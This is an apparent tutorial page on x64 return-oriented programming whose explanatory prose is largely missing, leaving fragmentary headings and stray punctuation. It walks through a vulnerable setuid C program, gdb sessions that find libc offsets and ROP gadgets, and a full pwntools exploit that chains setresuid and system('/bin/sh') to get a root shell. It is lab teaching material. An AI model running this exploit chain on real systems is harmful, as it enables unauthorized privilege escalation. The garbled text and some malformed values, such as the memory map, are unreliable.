

02.ROP(Return Oriented Programming)-x64

Unknown macro: 'html'

Excuse the ads! We need some help to keep our site up.

Unknown macro: 'html'

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Return Oriented Programming(ROP) -x64

- **ROP(Return-oriented programming) (NXbit) (Code signing)**
 - [RTL + Gadgets](#)
- **Stack Overflow , "(Gadgets)"**
 - [\(ret\)](#)
 - [.](#)

Gadgets - POP; POP; POP; RET

- **x86 pop , x64**
 - [x86 Cdecl\(C declaration\), x64 System V AMD64 ABI](#)
 - [: 01.The basics technic of Shellcode](#)
 - [x64 ROP POP](#)
 - [ESP](#)
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- **Gadgets**
 - [: "pop rdi; ret"](#)
 - [: "pop rsi; ret"](#)
 - [, : "pop rdi; pop rdx; ret"](#)
- [.](#)
 - [x64 Gadgets](#)
 - [read\(\) System\(\)](#)

ROP structure - x64

Stack Address	Value	Explanation
0x7fffffff498	Gadget(POP RDI, ret) Address	Return address area of function
0x7fffffff4a0	First argument value	
0x7fffffff4a8	Gadget(POP RSI, POP RDX, ret) Address	
0x7fffffff4b0	Second argument value	
0x7fffffff4b8	Third argument value	
0x7fffffff4c0	read function address of libc	
0x7fffffff4c8	Gadget(POP RDI, ret) Address	
0x7fffffff4d0	First argument value	
0x7fffffff4d8	System function address of libc	

Proof of concept

Example code

rop.c

```
#define __GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>

void vuln(){
    char buf[50];
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 256);
}

void main(){
    seteuid(getuid());
    write(1,"Hello ROP\n",10);
    vuln();
}
```

Build & Permission

Build

```
lazenca0x0@ubuntu:~/Exploit/ROP$ gcc -fno-stack-protector -o rop rop.c -ldl
lazenca0x0@ubuntu:~/Exploit/ROP$ sudo chown root:root ./rop
lazenca0x0@ubuntu:~/Exploit/ROP$ sudo chmod 4755 ./rop
```

Overflow

- **Breakpoints .**
 - 0x400756: vuln
 - 0x40079a: read()

Breakpoints

```
lazenca0x0@ubuntu:~/Exploit/ROP$ gdb -q ./rop
Reading symbols from ./rop...(no debugging symbols found)...done.
gdb-peda$ disassemble vuln
Dump of assembler code for function vuln:
   0x0000000000400756 <+0>:      push    rbp
   0x0000000000400757 <+1>:      mov     rbp, rsp
   0x000000000040075a <+4>:      sub     rsp, 0x40
   0x000000000040075e <+8>:      mov     esi, 0x400864
   0x0000000000400763 <+13>:     mov     rdi, 0xffffffffffffffff
   0x000000000040076a <+20>:     call    0x400630 <dlsym@plt>
   0x000000000040076f <+25>:     mov     QWORD PTR [rbp-0x8], rax
   0x0000000000400773 <+29>:     mov     rax, QWORD PTR [rbp-0x8]
   0x0000000000400777 <+33>:     mov     rsi, rax
   0x000000000040077a <+36>:     mov     edi, 0x40086b
   0x000000000040077f <+41>:     mov     eax, 0x0
   0x0000000000400784 <+46>:     call    0x400600 <printf@plt>
   0x0000000000400789 <+51>:     lea     rax, [rbp-0x40]
   0x000000000040078d <+55>:     mov     edx, 0x100
   0x0000000000400792 <+60>:     mov     rsi, rax
   0x0000000000400795 <+63>:     mov     edi, 0x0
   0x000000000040079a <+68>:     call    0x400610 <read@plt>
   0x000000000040079f <+73>:     nop
   0x00000000004007a0 <+74>:     leave
   0x00000000004007a1 <+75>:     ret
End of assembler dump.
gdb-peda$ b *0x0000000000400756
Breakpoint 1 at 0x400756
gdb-peda$ b *0x000000000040079a
Breakpoint 2 at 0x40079a
gdb-peda$
```

- **Overflow** .
 - Return address(0x7ffffffe458) - buf (0x7ffffffe410) = 72
 - , 72 Return address .

Overflow

```
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/ROP/rop
Hello ROP
Breakpoint 1, 0x0000000000400756 in vuln ()
gdb-peda$ i r rsp
rsp                0x7ffffffe458          0x7ffffffe458
gdb-peda$ x/gx 0x7ffffffe458
0x7ffffffe458:      0x00000000004007d0
gdb-peda$ c
Continuing.
Printf() address : 0x7ffff785e800
Breakpoint 2, 0x000000000040079a in vuln ()
gdb-peda$ i r rsi
rsi                0x7ffffffe410          0x7ffffffe410
gdb-peda$ p/d 0x7ffffffe458 - 0x7ffffffe410
$1 = 72
gdb-peda$
```

Exploit method

- ROP Exploit .

Exploit

1. setresuid root(0)
2. system "/bin/sh"

- .

ROP code

```
setresuid(0,0,0)
system(binsh)
```

- payload .

- "/bin/sh"
- libc offset
 - printf
 - system
 - setresuid
- - pop rdi,ret
 - pop rsi,ret
 - pop rdx,ret

Find the Libc address of the "/bin/sh"

- libc "/bin/sh" .
 - "/bin/sh" offset : 0x18cd57

Find the address of the "/bin/sh"

```
gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7995d57 --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$ info proc map
process 5555
Mapped address spaces:

      Start Addr           End Addr       Size     Offset objfile
      -
      0x400000             0x401000       0x1000        0x0 /home/lazenca0x0/Exploit/ROP/rop
      0x600000             0x601000       0x1000        0x0 /home/lazenca0x0/Exploit/ROP/rop
      0x601000             0x602000       0x1000       0x1000 /home/lazenca0x0/Exploit/ROP/rop
      0x602000             0x623000      0x21000        0x0 [heap]
      0x7ffff7809000       0x7ffff79c9000  0x1c0000        0x0 /lib/x86_64-linux-gnu/libc-2.23.so
      0x7ffff79c9000       0x7ffff7bc9000  0x200000       0x1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
      0x7ffff7bc9000       0x7ffff7bcd000   0x4000       0x1c0000 /lib/x86_64-linux-gnu/libc-2.23.so
      0x7ffff7bcd000       0x7ffff7bcf000   0x2000       0x1c4000 /lib/x86_64-linux-gnu/libc-2.23.so
      0x7ffff7bcf000       0x7ffff7bd3000   0x4000        0x0
      0x7ffff7bd3000       0x7ffff7bd6000   0x3000        0x0 /lib/x86_64-linux-gnu/libdl-2.23.so
      0x7ffff7bd6000       0x7ffff7dd5000  0x1ff000       0x3000 /lib/x86_64-linux-gnu/libdl-2.23.so
      0x7ffff7dd5000       0x7ffff7dd6000   0x1000       0x2000 /lib/x86_64-linux-gnu/libdl-2.23.so
      0x7ffff7dd6000       0x7ffff7dd7000   0x1000       0x3000 /lib/x86_64-linux-gnu/libdl-2.23.so
      0x7ffff7dd7000       0x7ffff7dfd000  0x26000        0x0 /lib/x86_64-linux-gnu/ld-2.23.so
      0x7ffff7dfd000       0x7ffff7fdc000   0x4000        0x0
      0x7ffff7ffd000       0x7ffff7ffa000   0x3000        0x0 [vvar]
      0x7ffff7ffa000       0x7ffff7ffc000   0x2000        0x0 [vdso]
      0x7ffff7ffc000       0x7ffff7ffd000   0x1000       0x25000 /lib/x86_64-linux-gnu/ld-2.23.so
      0x7ffff7ffd000       0x7ffff7ffe000   0x1000       0x26000 /lib/x86_64-linux-gnu/ld-2.23.so
      0x7ffff7ffe000       0x7ffff7fff000   0x1000        0x0
      0x7ffff7fff000       0x7ffff7fffde000  0x21000        0x0 [stack]
      0xffffffff600000     0xffffffff601000   0x1000       0x0 [vsyscall]
gdb-peda$ p/x 0x7ffff7995d57 - 0x7ffff7809000
$2 = 0x18cd57
gdb-peda$
```

Get offset of printf, system, and setresuid functions

- **Offset** .
 - printf(libcbase) : 0x55800
 - system : 0x45390
 - setresuid : 0xcd570

Get offset

```
gdb-peda$ p printf
$3 = {<text variable, no debug info>} 0x7ffff785e800 <__printf>
gdb-peda$ p system
$4 = {<text variable, no debug info>} 0x7ffff784e390 <__libc_system>
gdb-peda$ p setresuid
$5 = {<text variable, no debug info>} 0x7ffff78d6570 <__GI___setresuid>
gdb-peda$ p/x 0x7ffff785e800 - 0x7ffff7809000
$6 = 0x55800
gdb-peda$ p/x 0x7ffff784e390 - 0x7ffff7809000
$7 = 0x45390
gdb-peda$ p/x 0x7ffff78d6570 - 0x7ffff7809000
$8 = 0xcd570
gdb-peda$
```

Find gadget

peda

- **peda Gadgets** .

- RDI, RSI Gadgets , RDX .
 - 0x00400843: pop rdi; ret
 - 0x00400841: pop rsi; pop r15; ret
- libc Gadgets .

Find gadgets - peda

```
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400843 : (b'5fc3')      pop rdi; ret
gdb-peda$ ropsearch "pop rsi"
Searching for ROP gadget: 'pop rsi' in: binary ranges
0x00400841 : (b'5e415fc3')  pop rsi; pop r15; ret
gdb-peda$ ropsearch "pop rdx"
Searching for ROP gadget: 'pop rdx' in: binary ranges
Not found
gdb-peda$
```

rp++

- **rp++ Gadgets .**
 - Exploit code 0x001150c9 "pop rdx ; pop rsi ; ret ;" .

find "pop rdx"

```
lazenca0x0@ubuntu:~/Exploit/ROP$ ./rp-lin-x64 -f /lib/x86_64-linux-gnu/libc-2.23.so -r 2 | grep "pop rdx"
0x00137393: mov eax, dword [rbx+0x08] ; pop rdx ; call qword [rax+0x20] ; (1 found)
0x00137392: mov rax, qword [rbx+0x08] ; pop rdx ; call qword [rax+0x20] ; (1 found)
0x001464f6: pop rdx ; add eax, 0x83480000 ; retn 0x4910 ; (1 found)
0x00137396: pop rdx ; call qword [rax+0x20] ; (1 found)
0x00196111: pop rdx ; cld ; jmp qword [rax+0x5B] ; (1 found)
0x001960d5: pop rdx ; cld ; jmp qword [rax+0x5C] ; (1 found)
0x0019b399: pop rdx ; cli ; call qword [rsi+rax*2+0x02] ; (1 found)
0x0019b389: pop rdx ; cli ; jmp qword [rsi+rax*2] ; (1 found)
0x001b0549: pop rdx ; cmc ; jmp qword [rax+rax] ; (1 found)
0x001b0591: pop rdx ; cmc ; jmp qword [rax+rax] ; (1 found)
0x001b05a9: pop rdx ; cmc ; jmp qword [rax+rax] ; (1 found)
0x001b0561: pop rdx ; cmc ; jmp qword [rcx] ; (1 found)
0x001b0579: pop rdx ; cmc ; jmp qword [rcx] ; (1 found)
0x00197509: pop rdx ; in eax, dx ; jmp qword [rsp+rbp*4] ; (1 found)
0x00001b60: pop rdx ; int 0x4F ; jmp rdx ; (1 found)
0x00198538: pop rdx ; int1 ; jmp qword [rdx+rbx+0x01] ; (1 found)
0x00198539: pop rdx ; int1 ; jmp qword [rdx+rbx+0x01] ; (1 found)
0x000ac883: pop rdx ; or al, 0x00 ; ret ; (1 found)
0x001150a3: pop rdx ; pop r10 ; ret ; (1 found)
0x001150a4: pop rdx ; pop r10 ; ret ; (1 found)
0x00101ffc: pop rdx ; pop rbx ; ret ; (1 found)
0x001194ab: pop rdx ; pop rbx ; ret ; (1 found)
0x0011d174: pop rdx ; pop rbx ; ret ; (1 found)
0x001435b2: pop rdx ; pop rbx ; ret ; (1 found)
0x001435fa: pop rdx ; pop rbx ; ret ; (1 found)
0x00143824: pop rdx ; pop rbx ; ret ; (1 found)
0x001150c9: pop rdx ; pop rsi ; ret ; (1 found)
0x00001b92: pop rdx ; ret ; (1 found)
0x00001b96: pop rdx ; ret ; (1 found)
0x00001b9a: pop rdx ; ret ; (1 found)
0x00001b9e: pop rdx ; ret ; (1 found)
0x001150a6: pop rdx ; ret ; (1 found)
lazenca0x0@ubuntu:~/Exploit/ROP$
```

Exploit code

exploit.py

```
from pwn import *
from struct import *

#context.log_level = 'debug'

#64bit OS - /lib/x86_64-linux-gnu/libc-2.23.so
libcbase_printf_offset = 0x55800
libcbase_system_offset = 0x45390
libcbase_setresuid_offset = 0xcd570

binsh_offset = 0x18cd57

pop_rdi_ret = 0x400843
pop_rsi_ret = 0x400841
pop_rdx_ret_offset = 0x1150c9

r = process('./rop')

r.recv(10)
r.recvuntil('Printf() address : ')
libcbase = int(r.recvuntil('\n'),16)
libcbase -= libcbase_printf_offset

payload = "A"*72
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(libcbase + pop_rdx_ret_offset)
payload += p64(0)
payload += p64(0)
payload += p64(libcbase + libcbase_setresuid_offset)

payload += p64(pop_rdi_ret)
payload += p64(libcbase + binsh_offset)
payload += p64(libcbase + libcbase_system_offset)

r.send(payload)

r.interactive()
```


python rop.py

```
lazenca0x0@ubuntu:~/Exploit/ROP$ python exploit.py
[+] Starting local process './rop': pid 5698
[*] Switching to interactive mode
$ id
uid=0(root) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
```

Related site

- N/a

Comments

 Unknown macro: 'html'

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